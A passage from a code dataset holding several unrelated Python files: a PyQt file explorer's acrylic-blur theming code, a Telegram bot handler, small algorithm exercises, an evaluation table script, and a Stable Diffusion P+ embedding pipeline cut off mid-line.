url('C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_rea.jpeg');\r\n            background-repeat: no-repeat;\r\n            background-position: left;\r\n            border: 0;\"\"\")\r\n\r\n        elif self.theme_box.currentText() == 'Default':\r\n            self.set_acrylic(True, 'set_on_left')\r\n            self.themeRegistry('default')\r\n\r\n        elif self.theme_box.currentText() == 'Amoled':\r\n            self.set_acrylic(False, 'amoled')\r\n            self.themeRegistry('amoled')\r\n\r\n        elif self.theme_box.currentText() == 'Acrylic':\r\n            with open('effectSupport.dll', 'w') as writer:\r\n                writer.write('acrylic')\r\n            with open(\"assets/resources/holder.tru\", 'r') as val:\r\n                r = val.read()\r\n            # Frame One UI\r\n            frame_one_image = Image.open(f'C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_ref{r}.jpeg')\r\n            skinned_ = Image.eval(frame_one_image, lambda x: x / 2.2)\r\n\r\n            frame_one_blurred_image = skinned_.filter(GaussianBlur(radius=35))\r\n            frame_one_blurred_image.save(f\"C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_rea.jpeg\")\r\n\r\n            if self.effect_radiobutton.isChecked():\r\n                self.set_acrylic(False, 'transparent')\r\n                self.all_frame.setStyleSheet(f\"\"\"\r\n                background: url('C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_rea.jpeg');\r\n                background-repeat: no-repeat;\r\n                background-position: left;\r\n                border: 0;\"\"\")\r\n            else:\r\n                self.set_acrylic(False, 'amoled')\r\n                self.graphics.setStyleSheet(f\"\"\"\r\n                \r\n                background: url('C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_rea.jpeg');\r\n                background-repeat: no-repeat;\r\n                background-position: left;\r\n                border: 0;\"\"\")\r\n\r\n            self.themeRegistry('acrylic')\r\n        elif self.theme_box.currentText() == 'Transparent':\r\n            self.set_acrylic(False, 'semi-transparent')\r\n\r\ndef switch_check():\r\n    writer = open(\"config.dll\", \"w\")\r\n    if keyboard.is_pressed(\"alt\"):\r\n        writer.write(\"False\")\r\n    elif keyboard.read_key() == 'left windows':\r\n        writer.write('False')\r\n        print('window set up')\r\n    else:\r\n        writer.write(\"True\")\r\n\r\n    print('Checking switch..')\r\n    writer.close()\r\n\r\n# @ staticmethod\r\ndef check_window():\r\n    try:\r\n        # get the current active window\r\n        a = pygetwindow.getActiveWindowTitle()\r\n\r\n        if str(a) != \"Fluent Explorer.exe\":\r\n            try:\r\n\r\n                # minimize\r\n                MainWindow.showMinimized()\r\n\r\n                with open(\"config.dll\", \"r\") as reader:\r\n                    read_config = reader.read()\r\n\r\n                # grab screen\r\n                if read_config == \"True\" or read_config == '':\r\n                    get_image = screenshot()\r\n                    print('Using Brush..')\r\n\r\n                    # random value grabber\r\n                    r = str(randint(10, 100000))\r\n\r\n                    # save the value into a file for future use\r\n                    with open(\"assets/resources/holder.tru\", 'w') as hold:\r\n                        hold.write(r)\r\n\r\n                    # save the screenshot at this location\r\n                    get_image.save(f'C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_ref{r}.jpeg')\r\n\r\n                    with open(\"assets/resources/holder.tru\", 'r') as val:\r\n                        r = val.read()\r\n                    # Frame One UI\r\n                    frame_one_image = Image.open(f'C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_ref{r}.jpeg')\r\n                    skinned_ = Image.eval(frame_one_image, lambda x: x / 2.2)\r\n                    # blur the image\r\n                    with open('effectSupport.dll', 'r') as reader:\r\n                        read = reader.read()\r\n\r\n                    if read == 'ten':\r\n                        radii = 10\r\n                    else:\r\n                        radii = 35\r\n\r\n                    frame_one_blurred_image = skinned_.filter(GaussianBlur(radius=radii))\r\n                    frame_one_blurred_image.save(f\"C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/vis_reb1{r}.jpeg\")\r\n\r\n                # will raise an OS error if the image is subjected to 
modifications\r\n except OSError:\r\n pass\r\n\r\n elif MainWindow.isMaximized():\r\n MainWindow.setWindowOpacity(1.0)\r\n\r\n # FRAMES UI\r\n\r\n # FRAME 1\r\n with open(\"assets/resources/qr.tru\", \"r\") as reader:\r\n read = str(reader.read())\r\n\r\n if read == \"True\":\r\n with open(\"lib.dll\", \"r\") as reader:\r\n read = str(reader.read())\r\n\r\n if read == \"True\":\r\n # MainWindow.set_acrylic(True, \"set_all\")\r\n MainWindow.setTheme()\r\n else:\r\n # MainWindow.set_acrylic(True, \"set_on_left\")\r\n MainWindow.setTheme()\r\n with open(\"assets/resources/qr.tru\", \"w\") as writer:\r\n writer.write(\"False\")\r\n\r\n\r\n else:\r\n MainWindow.set_acrylic(False, \"dark\")\r\n\r\n except NameError:\r\n pass\r\n\r\n\r\ndef no_screen():\r\n current = pygetwindow.getActiveWindowTitle()\r\n if MainWindow.isMinimized() or current != \"Fluent Explorer.exe\" or not MainWindow.isMaximized():\r\n with open(\"assets/resources/block.tru\", \"w\") as writer:\r\n writer.write(\"True\")\r\n with open(\"assets/resources/qr.tru\", \"w\") as writer:\r\n writer.write(\"True\")\r\n if MainWindow.isMaximized():\r\n MainWindow.setWindowOpacity(1.0)\r\n with open(\"assets/resources/block.tru\", 'r') as reader:\r\n read = str(reader.read())\r\n if read == \"True\":\r\n MainWindow.fluentHandler()\r\n with open(\"assets/resources/block.tru\", \"w\") as writer:\r\n writer.write(\"False\")\r\n if MainWindow.isMinimized() or current != \"Fluent Explorer.exe\":\r\n with open(\"assets/resources/QtS.dll\", \"w\") as writer:\r\n writer.write(\"True\")\r\n\r\n if not MainWindow.isMaximized():\r\n\r\n with open(\"assets/resources/QtS.dll\", \"r\") as reader:\r\n read = str(reader.read())\r\n\r\n if read == \"True\":\r\n MainWindow.setStyleSheet(\"\"\"background-color: black;\"\"\")\r\n MainWindow.graphics.setStyleSheet(\"\"\"background-color: black;\"\"\")\r\n\r\n\r\ndef cleaner():\r\n walker = os.walk(f'C:/Users/{USER}/AppData/Local/Temp/CachedData/cache')\r\n\r\n for i in walker:\r\n r = i[2]\r\n for g in r:\r\n if g.endswith('.jpeg'):\r\n with open(f'assets/resources/holder.tru', \"r\") as t:\r\n ri = str(t.read())\r\n if ri in str(g):\r\n pass\r\n else:\r\n z = g\r\n try:\r\n os.remove(f\"C:/Users/{USER}/AppData/Local/Temp/CachedData/cache/{z}\")\r\n except (PermissionError, FileNotFoundError):\r\n pass\r\n\r\n\r\ndef clock(func, sec):\r\n def wrapper():\r\n clock(func, sec)\r\n func()\r\n\r\n t = Timer(sec, wrapper)\r\n try:\r\n t.start()\r\n except RuntimeError:\r\n pass\r\n\r\n\r\nclock(cleaner, 1.0)\r\nclock(switch_check, 0.2)\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n MainWindow = Main()\r\n windowTimer = QTimer()\r\n windowTimer.timeout.connect(no_screen)\r\n windowTimer.timeout.connect(check_window)\r\n windowTimer.setInterval(1)\r\n windowTimer.start()\r\n MainWindow.show()\r\n app.exec()\r\n\r\n\r\n","repo_name":"LegendAwaken/iSurf-File-Explorer","sub_path":"iSurf.py","file_name":"iSurf.py","file_ext":"py","file_size_in_byte":31858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38069266279","text":"# Файл хендлера \"client\"\n#\nfrom bot_init import bot\nfrom aiogram import types, Dispatcher\nfrom aiogram.types import ReplyKeyboardRemove\n# импортируем нашу клавиатуру для клиента\nfrom keyboards.keyboards_client import kb_client\n\n# @dp.message_handler(commands=['start', 'help'])\nasync def commands_start(message : types.Message):\n try:\n # добавим нашу клавиатуру добавив аргумент reply_markup=kb_client\n 
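# (English: attach our client keyboard by passing the reply_markup=kb_client argument)\n        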
await bot.send_message(message.from_user.id, \"Ты ввел /start или /help\", reply_markup=kb_client)\n        await bot.send_message(message.from_user.id, \"Сработала функция commands_start..\")\n    except Exception:\n        await message.reply(\"Общение с ботом только через ЛС, напишите ему.\")\n\n\nasync def menu(message : types.Message):\n    await bot.send_message(message.from_user.id, \"Меню пока не готово\")\n\nasync def info(message : types.Message):\n    await bot.send_message(message.from_user.id, \"Инфо о нас пока нет\")\n\n# reply_markup=ReplyKeyboardRemove() removes the keyboard\nasync def del_keyboard(message : types.Message):\n    await bot.send_message(message.from_user.id, \"Удаление клавиатуры\", reply_markup=ReplyKeyboardRemove())\n\ndef register_handlers_client(dp : Dispatcher):\n    dp.register_message_handler(commands_start, commands=['start', 'help'])\n    dp.register_message_handler(menu, commands=['menu'])\n    dp.register_message_handler(info, commands=['info'])\n    dp.register_message_handler(del_keyboard, commands=['del_keyboard'])","repo_name":"Azhdar1990/Parsers","sub_path":"telegram_aiogram/5_keyboard_buttons/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34855410439","text":"import numpy as np\nimport math\nimport matplotlib.pyplot as plt\nplt.style.use('ggplot')\n\ndef auto_correlate(x):\n    # relies on the module-level N (number of samples) defined below\n    cor = np.correlate(x,x,mode=\"full\")\n    return cor[N-1:]\ndef rng(seed, a, b, M, ntotal):\n    data = np.zeros(ntotal)\n    data[0] = seed\n    for i in range(1,ntotal):\n        data[i] = np.mod((a*data[i-1]+b), M)\n    return data/float(M)  # normalise the LCG output to [0, 1)\nseed,a,b,m,N = 123456, 8121, 28411, 134456, 100000\nX = rng(seed, a, b, m, N)\nc = auto_correlate(X-np.average(X))/N\nplt.plot(c/c[0],'r',lw=2)\nplt.xlabel(r'$i$')\nplt.ylabel(r'$\\varphi(i)$')\nplt.xlim(-500,8000)\nplt.show()\n","repo_name":"p768lwy3/MOOC_edX","sub_path":"KyotoUx009x - Stochastic Processes - Data Analysis and Computer Simulation/Week 2/hw2-4.py","file_name":"hw2-4.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13952969815","text":"#!/usr/bin/env python2.7\nfrom typing import List\n\ndef solution(l, t): # type: (List[int], int) -> List[int]\n    left = 0\n    right = 0\n    total = 0\n\n    while (left <= len(l)):\n        # If the right pointer goes through the entire array,\n        # this means the sum of numbers in range [left, right] is less than t.\n        # Break out of loop in this case.\n        if right >= len(l):\n            break\n\n        total += l[right]\n\n        if total == t:\n            return [left, right]\n\n        right += 1\n\n        if total > t:\n            left += 1\n            right = left\n            total = 0\n\n    return [-1, -1]\n\n\n# ============================ Official test-cases ============================\nassert solution([1, 2, 3, 4], 15) == [-1, -1], 'solution([1, 2, 3, 4], 15) failed!'\nassert solution([4, 3, 10, 2, 8], 12) == [2, 3], 'solution([4, 3, 10, 2, 8], 12) failed!'\n\n# =========== My own, unofficial test cases to help debug behaviour ===========\nassert solution([4, 3, 5, 7, 8], 12) == [0, 2], 'solution([4, 3, 5, 7, 8], 12) failed!'\nassert solution([1, 2, 4, 3, 5, 7, 8], 12) == [2, 4], 'solution([1, 2, 4, 3, 5, 7, 8], 12) failed!'\nassert solution([1, 12, 4], 12) == [1, 1], 'solution([1, 12, 4], 12) 
failed!'\n","repo_name":"Jamie-Rodriguez/google-foobar","sub_path":"numbers-station-coded-messages/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31833897533","text":"import os\nimport pickle\nimport itertools\nfrom tqdm import tqdm\nimport argparse\nimport numpy as np\nimport pandas as pd\n\nfrom evaluation.constants import DATASET_NAMES, INTERACTION_CATEGORIES, METRICS, METHOD_NAMES\nfrom evaluation.utils import mkdir_if_missing\n\n\ndef load_pickle_files(args):\n    results_dict = {}\n    for metric, ec, dset, method in tqdm(list(\n            itertools.product(args.metrics, args.evaluate_category, args.datasets, args.methods))):\n        agg = metric.split('_')[0]\n        metric = \"_\".join(metric.split('_')[1:])\n        if ec:\n            metric += \"_cat\"\n        pickle_dir = os.path.join(args.eval_results_path, method, dset)\n        try:\n            pickle_file = os.path.join(pickle_dir, f'stats_{metric}_{agg}.pkl')\n            with open(pickle_file, 'rb') as f:\n                stats = pickle.load(f)\n            avg = stats.avg\n            if ec:\n                for cat_i, cat in enumerate(INTERACTION_CATEGORIES.values()):\n                    key_tup = cat, method, dset, metric\n                    if avg is None:\n                        results_dict[key_tup] = np.nan\n                    else:\n                        results_dict[key_tup] = avg[cat_i]\n            else:\n                key_tup = 'agg', method, dset, metric\n                if avg is None:\n                    results_dict[key_tup] = np.nan\n                else:\n                    results_dict[key_tup] = avg\n        except FileNotFoundError:\n            print(f\"No file found for {dset} {method} {metric}-{agg} {'ec' if ec else ''} @ {pickle_file}\")\n            continue\n\n    return results_dict\n\n\ndef main(args):\n    # generate results tables\n    results_dict = load_pickle_files(args)\n    df = pd.DataFrame(list(results_dict.values()), index=pd.MultiIndex.from_tuples(list(results_dict.keys())))\n    df = df.reset_index()\n    df.columns = ['Category', 'Method', 'Dataset', 'Metric', 'Value']\n    # get datasets as the columns, and add the ETH_UCY Avg. as a column\n    
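# pivot below: one row per (Category, Method, Metric), one column per dataset\n    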
df = df.pivot_table(index=['Category', 'Method', 'Metric'], columns='Dataset', values='Value')\n    if len(df.index.get_level_values('Category').unique()) == 1:\n        df.reset_index(level='Category', drop=True, inplace=True)\n    mkdir_if_missing(args.save_results_path)\n    for metric in df.index.get_level_values('Metric').unique():\n        df.xs(metric, level='Metric').to_csv(os.path.join(args.save_results_path, f'{metric}.tsv'), sep='\\t')\n\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--methods', '-m', nargs='+', type=str, default=METHOD_NAMES)\n    parser.add_argument('--datasets', '-d', nargs='+', type=str, default=DATASET_NAMES)\n    parser.add_argument('--aggregations', '-a', nargs='+', type=str, default=['min', 'mean'])\n    parser.add_argument('--evaluate_category', '-ec', nargs='+',\n                        type=lambda x: x.lower() == \"true\", default=[False])\n    parser.add_argument('--metrics', '-mr', nargs='+', type=str, default=METRICS)\n    parser.add_argument('--num_samples', '-ns', nargs='+', type=int, default=[20])\n    parser.add_argument('--eval_results_path', default='results/evaluations')\n    parser.add_argument('--save_results_path', default='results/results_tables')\n\n    args = parser.parse_args()\n    main(args)","repo_name":"ericaweng/joint-metrics-matter","sub_path":"get_results_tables.py","file_name":"get_results_tables.py","file_ext":"py","file_size_in_byte":3331,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"73261925650","text":"def search(mat, n, x):\n    if n == 0:\n        return -1\n\n    # Traverse through the matrix\n    for i in range(n):\n        for j in range(n):\n\n            # If the element is found\n            if mat[i][j] == x:\n                print(\"Element found at (\", i, \",\", j, \")\")\n                return 1\n\n    print(\" Element not found\")\n    return 0\n\n\ndef search_v1(mat, n, x):\n    i = 0\n\n    # set indexes for top right element\n    j = n - 1\n    while i < n and j >= 0:\n\n        if mat[i][j] == x:\n            print(\"\\n Found at \", i, \", \", j)\n            return 1\n\n        if mat[i][j] > x:\n            j -= 1\n\n        # if mat[i][j] < x\n        else:\n            i += 1\n\n    print(\"Element not found\")\n    return 0  # if (i == n || j == -1 )\n\n\ndef search_v2(mat, x, i, j):\n    # recursive staircase search; call it with i=0, j=len(mat)-1 (top-right corner)\n    if i >= len(mat) or j < 0:\n        return -1\n\n    if mat[i][j] == x:\n        return (i, j)\n\n    if x > mat[i][j]:\n        return search_v2(mat, x, i + 1, j)\n    # x < mat[i][j]\n    return search_v2(mat, x, i, j - 1)\n\n\nif __name__ == \"__main__\":\n    mat = [\n        [10, 20, 30, 40],\n        [15, 25, 35, 45],\n        [27, 29, 37, 48],\n        [32, 33, 39, 50],\n    ]\n    search(mat, 4, 29)\n\n    print(\"-----------\")\n    mat = [\n        [10, 20, 30, 40],\n        [15, 25, 35, 45],\n        [27, 29, 37, 48],\n        [32, 33, 39, 50],\n    ]\n    search_v1(mat, 4, 29)\n\n    print(\"-----------\")\n    mat = [\n        [10, 20, 30, 40],\n        [15, 25, 35, 45],\n        [27, 29, 37, 48],\n        [32, 33, 39, 50],\n    ]\n    print(search_v2(mat, 29, 0, len(mat) - 1))\n","repo_name":"Chitrank-Dixit/coding-questions","sub_path":"dcp/arrays/search_in_matrix.py","file_name":"search_in_matrix.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5607180183","text":"import os\nimport json\nfrom typing import Optional, List, Union, Callable, Dict, Any, Tuple\nimport torch\nfrom transformers import CLIPTextModel, CLIPTokenizer\nfrom diffusers import StableDiffusionPipeline\nfrom diffusers.pipelines.stable_diffusion.pipeline_stable_diffusion import StableDiffusionPipelineOutput\nfrom diffusers.utils import logging\nfrom huggingface_hub import hf_hub_download\nfrom 
prompt_plus.prompt_plus_unet_2d_condition import PPlusUNet2DConditionModel\n\n\nlogger = logging.get_logger(__name__)\n\n\nclass TextualInversionStableDiffusionPipeline(StableDiffusionPipeline):\n @classmethod\n def from_learned_embed(\n cls,\n pretrained_model_name_or_path: Union[str, os.PathLike],\n learned_embed_name_or_path: Union[str, os.PathLike],\n **kwargs\n ):\n if os.path.exists(learned_embed_name_or_path):\n embeds_path = os.path.join(learned_embed_name_or_path, \"learned_embeds.bin\") if os.path.isdir(learned_embed_name_or_path) else learned_embed_name_or_path\n # token_path = os.path.join(model_dir, \"token_identifier.txt\")\n else:\n # download\n embeds_path = hf_hub_download(repo_id=learned_embed_name_or_path, filename=\"learned_embeds.bin\")\n # token_path = hf_hub_download(repo_id=learned_embed_name_or_path, filename=\"token_identifier.txt\")\n\n text_encoder = CLIPTextModel.from_pretrained(\n pretrained_model_name_or_path, subfolder=\"text_encoder\", **kwargs\n )\n tokenizer = CLIPTokenizer.from_pretrained(pretrained_model_name_or_path, subfolder=\"tokenizer\", **kwargs)\n loaded_learned_embeds = torch.load(embeds_path, map_location=\"cpu\")\n # separate token and the embeds\n trained_token = list(loaded_learned_embeds.keys())[0]\n embeds = loaded_learned_embeds[trained_token]\n\n # cast to dtype of text_encoder\n dtype = text_encoder.get_input_embeddings().weight.dtype\n embeds.to(dtype)\n\n # add the token in tokenizer\n # token = token if token is not None else trained_token\n num_added_tokens = tokenizer.add_tokens(trained_token)\n if num_added_tokens == 0:\n raise ValueError(\n f\"The tokenizer already contains the token {trained_token}. Please pass a different `token` that is not already in the tokenizer.\")\n\n # resize the token embeddings\n text_encoder.resize_token_embeddings(len(tokenizer))\n\n # get the id for the token and assign the embeds\n token_id = tokenizer.convert_tokens_to_ids(trained_token)\n text_encoder.get_input_embeddings().weight.data[token_id] = embeds\n print(f\"placeholder_token: {trained_token}\")\n return super().from_pretrained(\n pretrained_model_name_or_path=pretrained_model_name_or_path,\n text_encoder=text_encoder,\n tokenizer=tokenizer,\n **kwargs\n )\n\n\ndef _load_embed_from_name_or_path(learned_embed_name_or_path):\n if os.path.exists(learned_embed_name_or_path):\n embeds_path = os.path.join(learned_embed_name_or_path, \"learned_embeds.bin\") if os.path.isdir(\n learned_embed_name_or_path) else learned_embed_name_or_path\n # config_path = os.path.join(model_dir, \"config.json\")\n else:\n # download\n embeds_path = hf_hub_download(repo_id=learned_embed_name_or_path, filename=\"learned_embeds.bin\")\n # config_path = hf_hub_download(repo_id=pretrained_model_name_or_path, filename=\"config.json\")\n # with open(config_path, \"r\", encoding=\"utf-8\") as f:\n # config = json.load(f)\n # load\n loaded_learned_embeds = torch.load(embeds_path, map_location=\"cpu\")\n return loaded_learned_embeds\n\n\ndef load_embed_from_name_or_path(learned_embed_name_or_path, style_mixing_k_K=None):\n if isinstance(learned_embed_name_or_path, str):\n assert style_mixing_k_K is None, \"You inputted only one learned embed but `style_mixing_k_K` was specified!\"\n return _load_embed_from_name_or_path(learned_embed_name_or_path)\n else:\n assert len(learned_embed_name_or_path) == 2, \"Only 2 embeds are supported for now but it's especially possible.\"\n k, K = style_mixing_k_K\n embeds = []\n for p in learned_embed_name_or_path:\n 
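# load both embedding dicts up front; the loop further below then picks,\n            # token index by token index, which of the two supplies each embedding\n            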
embeds.append(_load_embed_from_name_or_path(p))\n # use first embeds tokens to align\n tokens = list(embeds[0].keys())\n n = len(tokens)\n assert k < n, f\"k must be lower than n={n}\"\n assert K < n, f\"K must be lower than n={n}\"\n loaded_learned_embeds = dict()\n for i in range(n):\n if i <= k or K > i:\n embed_idx = 0\n else:\n embed_idx = 1\n embed = list(embeds[embed_idx].values())[i]\n loaded_learned_embeds[tokens[i]] = embed\n return loaded_learned_embeds\n\n\nclass PPlusStableDiffusionPipeline(StableDiffusionPipeline):\n @classmethod\n def from_learned_embed(\n cls,\n pretrained_model_name_or_path: Union[str, os.PathLike],\n learned_embed_name_or_path: Optional[Union[str, os.PathLike, List[str]]] = None,\n style_mixing_k_K: Optional[Tuple[int]] = None,\n loaded_learned_embeds: Optional[Dict[str, torch.Tensor]] = None,\n **kwargs,\n ):\n text_encoder = CLIPTextModel.from_pretrained(\n pretrained_model_name_or_path, subfolder=\"text_encoder\", **kwargs\n )\n tokenizer = CLIPTokenizer.from_pretrained(pretrained_model_name_or_path, subfolder=\"tokenizer\", **kwargs)\n if loaded_learned_embeds is None:\n loaded_learned_embeds = load_embed_from_name_or_path(learned_embed_name_or_path, style_mixing_k_K)\n new_tokens = list(loaded_learned_embeds.keys())\n # easy validation for textual inversion\n assert len(new_tokens) > 1, \"You might want to load textual inversion pipeline!\"\n # cast to dtype of text_encoder\n dtype = text_encoder.get_input_embeddings().weight.dtype\n # resize the token embeddings\n text_encoder.resize_token_embeddings(len(tokenizer)+len(new_tokens))\n\n for token in new_tokens:\n embeds = loaded_learned_embeds[token]\n embeds.to(dtype)\n # add the token in tokenizer\n # token = token if token is not None else trained_token\n num_added_tokens = tokenizer.add_tokens(token)\n if num_added_tokens == 0:\n raise ValueError(\n f\"The tokenizer already contains the token {token}. 
Please pass a different `token` that is not already in the tokenizer.\")\n # get the id for the token and assign the embeds\n token_id = tokenizer.convert_tokens_to_ids(token)\n text_encoder.get_input_embeddings().weight.data[token_id] = loaded_learned_embeds[token]\n # store placeholder_token to text_encoder config\n text_encoder.config.placeholder_token = \"-\".join(new_tokens[0].split(\"-\")[:-1])\n text_encoder.config.placeholder_tokens = new_tokens\n print(f\"placeholder_token: {text_encoder.config.placeholder_token}\")\n unet = PPlusUNet2DConditionModel.from_pretrained(pretrained_model_name_or_path, subfolder=\"unet\", **kwargs)\n return super().from_pretrained(\n pretrained_model_name_or_path=pretrained_model_name_or_path,\n unet=unet,\n text_encoder=text_encoder,\n tokenizer=tokenizer,\n **kwargs\n )\n\n def _encode_prompt(\n self,\n prompt,\n device,\n num_images_per_prompt,\n do_classifier_free_guidance,\n negative_prompt=None,\n prompt_embeds: Optional[torch.FloatTensor] = None,\n negative_prompt_embeds: Optional[torch.FloatTensor] = None,\n ):\n assert isinstance(prompt, str), \"Currently, only string `prompt` is supported!\"\n if prompt is not None and isinstance(prompt, str):\n batch_size = 1\n elif prompt is not None and isinstance(prompt, list):\n batch_size = len(prompt)\n else:\n batch_size = prompt_embeds.shape[0]\n\n if prompt_embeds is None:\n encoder_hidden_states_list = []\n for token in self.text_encoder.config.placeholder_tokens:\n one_prompt = prompt.replace(self.text_encoder.config.placeholder_token, token)\n text_inputs = self.tokenizer(\n one_prompt,\n padding=\"max_length\",\n max_length=self.tokenizer.model_max_length,\n truncation=True,\n return_tensors=\"pt\",\n )\n text_input_ids = text_inputs.input_ids\n untruncated_ids = self.tokenizer(one_prompt, padding=\"longest\", return_tensors=\"pt\").input_ids\n\n if untruncated_ids.shape[-1] >= text_input_ids.shape[-1] and not torch.equal(\n text_input_ids, untruncated_ids\n ):\n removed_text = self.tokenizer.batch_decode(\n untruncated_ids[:, self.tokenizer.model_max_length - 1: -1]\n )\n logger.warning(\n \"The following part of your input was truncated because CLIP can only handle sequences up to\"\n f\" {self.tokenizer.model_max_length} tokens: {removed_text}\"\n )\n\n if hasattr(self.text_encoder.config,\n \"use_attention_mask\") and self.text_encoder.config.use_attention_mask:\n attention_mask = text_inputs.attention_mask.to(device)\n else:\n attention_mask = None\n\n prompt_embeds = self.text_encoder(\n text_input_ids.to(device),\n attention_mask=attention_mask,\n )\n prompt_embeds = prompt_embeds[0]\n prompt_embeds = prompt_embeds.to(dtype=self.text_encoder.dtype, device=device)\n\n bs_embed, seq_len, _ = prompt_embeds.shape\n # duplicate text embeddings for each generation per prompt, using mps friendly method\n prompt_embeds = prompt_embeds.repeat(1, num_images_per_prompt, 1)\n prompt_embeds = prompt_embeds.view(bs_embed * num_images_per_prompt, seq_len, -1)\n\n # get unconditional embeddings for classifier free guidance\n if do_classifier_free_guidance:\n uncond_tokens: List[str]\n if negative_prompt is None:\n uncond_tokens = [\"\"] * batch_size\n elif type(prompt) is not type(negative_prompt):\n raise TypeError(\n f\"`negative_prompt` should be the same type to `prompt`, but got {type(negative_prompt)} !=\"\n f\" {type(prompt)}.\"\n )\n elif isinstance(negative_prompt, str):\n uncond_tokens = [negative_prompt]\n elif batch_size != len(negative_prompt):\n raise ValueError(\n f\"`negative_prompt`: 
{negative_prompt} has batch size {len(negative_prompt)}, but `prompt`:\"\n f\" {prompt} has batch size {batch_size}. Please make sure that passed `negative_prompt` matches\"\n \" the batch size of `prompt`.\"\n )\n else:\n uncond_tokens = negative_prompt\n\n max_length = prompt_embeds.shape[1]\n uncond_input = self.tokenizer(\n uncond_tokens,\n padding=\"max_length\",\n max_length=max_length,\n truncation=True,\n return_tensors=\"pt\",\n )\n\n if hasattr(self.text_encoder.config,\n \"use_attention_mask\") and self.text_encoder.config.use_attention_mask:\n attention_mask = uncond_input.attention_mask.to(device)\n else:\n attention_mask = None\n\n negative_prompt_embeds = self.text_encoder(\n uncond_input.input_ids.to(device),\n attention_mask=attention_mask,\n )\n negative_prompt_embeds = negative_prompt_embeds[0]\n\n # duplicate unconditional embeddings for each generation per prompt, using mps friendly method\n seq_len = negative_prompt_embeds.shape[1]\n\n negative_prompt_embeds = negative_prompt_embeds.to(dtype=self.text_encoder.dtype, device=device)\n\n negative_prompt_embeds = negative_prompt_embeds.repeat(1, num_images_per_prompt, 1)\n negative_prompt_embeds = negative_prompt_embeds.view(batch_size * num_images_per_prompt, seq_len,\n -1)\n\n # For classifier free guidance, we need to do two forward passes.\n # Here we concatenate the unconditional and text embeddings into a single batch\n # to avoid doing two forward passes\n prompt_embeds = torch.cat([negative_prompt_embeds, prompt_embeds])\n\n encoder_hidden_states_list.append(prompt_embeds)\n else:\n # trust you!\n encoder_hidden_states_list = prompt_embeds\n return encoder_hidden_states_list\n\n @torch.no_grad()\n def __call__(\n self,\n prompt: Union[str, List[str]] = None,\n height: Optional[int] = None,\n width: Optional[int] = None,\n num_inference_steps: int = 50,\n guidance_scale: float = 7.5,\n negative_prompt: Optional[Union[str, List[str]]] = None,\n num_images_per_prompt: Optional[int] = 1,\n eta: float = 0.0,\n generator: Optional[Union[torch.Generator, List[torch.Generator]]] = None,\n latents: Optional[torch.FloatTensor] = None,\n prompt_embeds: Optional[torch.FloatTensor] = None,\n negative_prompt_embeds: Optional[torch.FloatTensor] = None,\n output_type: Optional[str] = \"pil\",\n return_dict: bool = True,\n callback: Optional[Callable[[int, int, torch.FloatTensor], None]] = None,\n callback_steps: int = 1,\n cross_attention_kwargs: Optional[Dict[str, Any]] = None,\n ):\n # 0. Default height and width to unet\n height = height or self.unet.config.sample_size * self.vae_scale_factor\n width = width or self.unet.config.sample_size * self.vae_scale_factor\n\n # 1. Check inputs. Raise error if not correct\n self.check_inputs(\n prompt, height, width, callback_steps, negative_prompt, prompt_embeds, negative_prompt_embeds\n )\n\n # 2. Define call parameters\n if prompt is not None and isinstance(prompt, str):\n batch_size = 1\n elif prompt is not None and isinstance(prompt, list):\n batch_size = len(prompt)\n else:\n batch_size = prompt_embeds.shape[0]\n\n device = self._execution_device\n # here `guidance_scale` is defined analog to the guidance weight `w` of equation (2)\n # of the Imagen paper: https://arxiv.org/pdf/2205.11487.pdf . `guidance_scale = 1`\n # corresponds to doing no classifier free guidance.\n do_classifier_free_guidance = guidance_scale > 1.0\n\n # 3. 
Encode input prompt\n encoder_hidden_states_list = self._encode_prompt(\n prompt,\n device,\n num_images_per_prompt,\n do_classifier_free_guidance,\n negative_prompt,\n prompt_embeds=prompt_embeds,\n negative_prompt_embeds=negative_prompt_embeds,\n )\n\n # 4. Prepare timesteps\n self.scheduler.set_timesteps(num_inference_steps, device=device)\n timesteps = self.scheduler.timesteps\n\n # 5. Prepare latent variables\n num_channels_latents = self.unet.in_channels\n latents = self.prepare_latents(\n batch_size * num_images_per_prompt,\n num_channels_latents,\n height,\n width,\n encoder_hidden_states_list[0].dtype,\n device,\n generator,\n latents,\n )\n\n # 6. Prepare extra step kwargs. TODO: Logic should ideally just be moved out of the pipeline\n extra_step_kwargs = self.prepare_extra_step_kwargs(generator, eta)\n\n # 7. Denoising loop\n num_warmup_steps = len(timesteps) - num_inference_steps * self.scheduler.order\n with self.progress_bar(total=num_inference_steps) as progress_bar:\n for i, t in enumerate(timesteps):\n # expand the latents if we are doing classifier free guidance\n latent_model_input = torch.cat([latents] * 2) if do_classifier_free_guidance else latents\n latent_model_input = self.scheduler.scale_model_input(latent_model_input, t)\n\n # predict the noise residual\n noise_pred = self.unet(\n latent_model_input,\n t,\n encoder_hidden_states_list=encoder_hidden_states_list,\n cross_attention_kwargs=cross_attention_kwargs,\n ).sample\n\n # perform guidance\n if do_classifier_free_guidance:\n noise_pred_uncond, noise_pred_text = noise_pred.chunk(2)\n noise_pred = noise_pred_uncond + guidance_scale * (noise_pred_text - noise_pred_uncond)\n\n # compute the previous noisy sample x_t -> x_t-1\n latents = self.scheduler.step(noise_pred, t, 